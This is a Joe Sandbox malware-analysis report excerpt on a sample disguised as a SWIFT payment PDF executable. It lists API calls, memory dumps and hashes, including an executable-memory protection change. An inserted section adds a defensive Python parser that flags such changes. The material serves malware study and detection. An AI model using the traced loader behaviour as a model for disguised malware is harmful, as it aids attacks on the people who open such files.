                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Window$EnableShow
                                      • String ID:
                                      • API String ID: 1136574915-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,80000000,00000003), ref: 00405829
                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040584B
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: File$AttributesCreate
                                      • String ID:
                                      • API String ID: 415043291-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAlloc.KERNELBASE(00000000), ref: 1000285B
                                      • GetLastError.KERNEL32 ref: 10002962
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134294229538.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_10000000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: AllocErrorLastVirtual
                                      • String ID:
                                      • API String ID: 497505419-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 0040166B
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: FileMove
                                      • String ID:
                                      • API String ID: 3562171763-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402272
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: PrivateProfileStringWrite
                                      • String ID:
                                      • API String ID: 390214022-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004025F7
                                        • Part of subcall function 00405AD5: wsprintfA.USER32 ref: 00405AE2
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: FilePointerwsprintf
                                      • String ID:
                                      • API String ID: 327478801-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EBC,000000FF,00000004,00000000,00000000,00000000), ref: 00403089
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(00000000,00000527,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: 4944fcb4b0595bcf744489a17d5e431ec8a9cb0b5ea9cf1e3315565daf770c26
                                      • Instruction ID: 2076060dfd2ee921fe50c9635413a5f0d56a6b8cd73322b3d01e2a4deb0b2e86
                                      • Opcode Fuzzy Hash: 4944fcb4b0595bcf744489a17d5e431ec8a9cb0b5ea9cf1e3315565daf770c26
                                      • Instruction Fuzzy Hash: 39E04F76250108AED700EBA5DD46EA57BDCA704704F008021B608D6091CA78E5508B58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 100026E0
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134294229538.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                       • Associated: 00000006.00000002.134294192586.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000006.00000002.134294264369.0000000010003000.00000002.00000001.01000000.00000008.sdmp
                                       • Associated: 00000006.00000002.134294303301.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_10000000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                      • Instruction ID: 50d40a96d24def304b4b26cf20c6df658c6444d5d293e09e435d7040471c3010
                                      • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                      • Instruction Fuzzy Hash: 2BF09BF19092A0DEF360DF688CC47063FE4E7983D5B03852AE358F6269EB3445448B19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022B0
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: PrivateProfileString
                                      • String ID:
                                      • API String ID: 1096422788-0
                                      • Opcode ID: 4ed2931d6e1322bdaa9ad50cb4953df85b5dadb3ad55792b24e6397abbc445e7
                                      • Instruction ID: 0f98334ba99eddbf462717ac0d7b36237a5f237946376121c7889506776d1579
                                      • Opcode Fuzzy Hash: 4ed2931d6e1322bdaa9ad50cb4953df85b5dadb3ad55792b24e6397abbc445e7
                                      • Instruction Fuzzy Hash: 31E08630E44244BADB10AFB1CD49AFD7A68AF05710F10403AF9907B0D1EAB894429B1D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 0406370b8f003bb152fa9e6d882341a85f632a90c69b99869c7c344d59a0b238
                                      • Instruction ID: c88b0ddfb076c9ac8c8172e2ede98752ab09736af03c38ff4908af3a3297ae85
                                      • Opcode Fuzzy Hash: 0406370b8f003bb152fa9e6d882341a85f632a90c69b99869c7c344d59a0b238
                                      • Instruction Fuzzy Hash: 6CD01233B041149BCB00DBA89E4899D77A0DB44325F248637D111F11D1D6BD85416619
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendMessageA.USER32(000103F0,00000000,00000000,00000000), ref: 00403EE5
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: b90161ae8cda5cbd2de65598e29a38e6d4b8b6f2e7bfd1190cff9b69a8922c47
                                      • Instruction ID: 47e4f8cec5362ef7ba492606aa4db3ba17659bb6329be143cabb9808bdc3d1f3
                                      • Opcode Fuzzy Hash: b90161ae8cda5cbd2de65598e29a38e6d4b8b6f2e7bfd1190cff9b69a8922c47
                                      • Instruction Fuzzy Hash: 03C04C716482016BEA218B519D49F177758A750701F188425B610A50D0C675E410D66D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DFA,?), ref: 004030B2
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                      • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                      • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                      • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendMessageA.USER32(00000028,?,00000001,00403CED), ref: 00403ECA
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 03409981cf4ee464f739a57fbc3ade95d75e68a5d1ce81eec46599a942b3d8ba
                                      • Instruction ID: 6533290ec96ace9f69d4b5d2bc7ee10b2e44395606cff802ce15a0f50474627a
                                      • Opcode Fuzzy Hash: 03409981cf4ee464f739a57fbc3ade95d75e68a5d1ce81eec46599a942b3d8ba
                                      • Instruction Fuzzy Hash: 99B01235588200BBEE224B00DD0DF457EA2F7A4701F00C024F300240F1C7B200A5DB19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserCallbackDispatcher.NTDLL(?,00403C86), ref: 00403EB3
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CallbackDispatcherUser
                                      • String ID:
                                      • API String ID: 2492992576-0
                                      • Opcode ID: 98b266ebdf0f3c27f3687bff4252ab036e6b5e8ad03fafb5568fabfe7cf076f6
                                      • Instruction ID: 4f3b606e1f3b2692e0293683fec327d542fd6d14cd426307677a9e2f6e263f5f
                                      • Opcode Fuzzy Hash: 98b266ebdf0f3c27f3687bff4252ab036e6b5e8ad03fafb5568fabfe7cf076f6
                                      • Instruction Fuzzy Hash: F2A01231404001EBCB018B10DF05C057F21B7503007018421E1404003486310420FF1A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CharNextA.USER32(?,0040319C,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",00000020), ref: 0040565C
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CharNext
                                      • String ID:
                                      • API String ID: 3213498283-0
                                      • Opcode ID: cab86ad4fbbc926bf9d9c4068ad28f349fd9e0cffecbcadba0a0645dfc6f61bb
                                      • Instruction ID: 6e4b35d103a21483788ebd864c5a0626f5b9ee6a2529c86503c35e2e2383ccd4
                                      • Opcode Fuzzy Hash: cab86ad4fbbc926bf9d9c4068ad28f349fd9e0cffecbcadba0a0645dfc6f61bb
                                      • Instruction Fuzzy Hash: B9C0803440C74467C71057305434C677FE0EA71301F9C4C56F0C963150C135A800CF1A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

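                                       The "APIs" bullets in the function summaries above (for instance the VirtualProtect call on the 10000000 module that requests protection 00000040, and the RegOpenKeyExA, SetFileAttributesA and CharNextA entries) all share one text shape: API.MODULE(arg,arg,...), ref: address, with "?" for values the sandbox could not resolve and double quotes around string arguments. As an added example that is not part of this Joe Sandbox report, the following Python turns those bullets into structured records, flags any protection change to PAGE_EXECUTE_READWRITE (0x40), and decodes the base address and protection field of the .sdmp names listed under Memory Dump Source. The sample bullets are copied from this page; the meaning of the .sdmp name fields other than the base address and the protection value is an assumption and is returned undecoded.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Union

# One "APIs" bullet from a Joe Sandbox function summary, e.g.
#   • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 100026E0
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Memory-protection constants from winnt.h (VirtualProtect's flNewProtect and,
# by the same encoding, the protection field of the .sdmp file names).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Position of the new-protection argument in the protection-changing APIs.
NEW_PROTECT_ARG = {"VirtualProtect": 2, "VirtualProtectEx": 3}

Arg = Union[int, str, None]


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]   # int for hex literals, str for quoted strings, None for "?"
    ref: int          # call-site address given after "ref:"


def split_args(raw: str) -> List[str]:
    """Split on commas, but not on commas inside a double-quoted string argument."""
    out, cur, quoted = [], [], False
    for ch in raw:
        if ch == '"':
            quoted = not quoted
            cur.append(ch)
        elif ch == "," and not quoted:
            out.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    if raw != "":
        out.append("".join(cur))
    return out


def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None                       # value unknown to the sandbox
    if len(tok) >= 2 and tok[0] == '"' and tok[-1] == '"':
        return tok[1:-1]                  # string argument, quotes stripped
    try:
        return int(tok, 16)               # report prints numbers as bare hex
    except ValueError:
        return tok                        # anything else is kept verbatim


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    args = [parse_arg(t) for t in split_args(m["args"])]
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16))


def parse_report(lines) -> List[ApiCall]:
    """Keep only the lines that are API bullets; headers and hashes are skipped."""
    return [c for c in (parse_api_line(l) for l in lines) if c is not None]


def find_rwx_calls(calls: List[ApiCall]) -> List[ApiCall]:
    """Calls that make a region writable and executable at the same time."""
    hits = []
    for c in calls:
        idx = NEW_PROTECT_ARG.get(c.api)
        if idx is not None and idx < len(c.args) and c.args[idx] == 0x40:
            hits.append(c)
    return hits


def calls_by_module(calls: List[ApiCall]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for c in calls:
        counts[c.module] = counts.get(c.module, 0) + 1
    return counts


def parse_dump_name(name: str) -> dict:
    """Decode a Memory Dump Source file name such as
    00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp
    Field 4 is the region base and field 5 its page protection (this matches the
    page's own "Offset: 00400000" and the RX text section at 401000); the other
    fields are returned raw because their meaning is assumed, not documented here."""
    if not name.endswith(".sdmp"):
        raise ValueError("not a .sdmp name")
    parts = name[: -len(".sdmp")].split(".")
    if len(parts) != 8:
        raise ValueError("unexpected number of fields")
    prot = int(parts[4], 16)
    return {"base": int(parts[3], 16),
            "protection": PAGE_PROTECT.get(prot, hex(prot)),
            "raw_fields": parts}


# Constructed sample: four bullets copied from the function summaries on this page.
SAMPLE = r"""
• VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 100026E0
• RegOpenKeyExA.KERNELBASE(00000000,00000527,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
• SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
• CharNextA.USER32(?,0040319C,"C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe",00000020), ref: 0040565C
""".strip().splitlines()

if __name__ == "__main__":
    calls = parse_report(SAMPLE)
    for c in find_rwx_calls(calls):
        print(f"RWX protection change at {c.ref:08X}: {c.api} on {c.args[0]:08X}")
    print(calls_by_module(calls))
    print(parse_dump_name("00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp"))
```

                                       The RWX check is the one most worth automating across a large report: a loader that rewrites a page to PAGE_EXECUTE_READWRITE before jumping into it is the pattern behind the "Creates a process in suspended mode (likely to inject code)" and obfuscation signatures in the overview, and the ref: address tells you which function to open in the snapshot.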
                                      APIs
                                      • GetDlgItem.USER32(?,000003F9), ref: 00404819
                                      • GetDlgItem.USER32(?,00000408), ref: 00404824
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 0040486E
                                      • LoadBitmapA.USER32(0000006E), ref: 00404881
                                      • SetWindowLongA.USER32(?,000000FC,00404DF8), ref: 0040489A
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048AE
                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048C0
                                      • SendMessageA.USER32(?,00001109,00000002), ref: 004048D6
                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048E2
                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048F4
                                      • DeleteObject.GDI32(00000000), ref: 004048F7
                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404922
                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 0040492E
                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049C3
                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049EE
                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A02
                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404A31
                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A3F
                                      • ShowWindow.USER32(?,00000005), ref: 00404A50
                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B4D
                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BB2
                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BC7
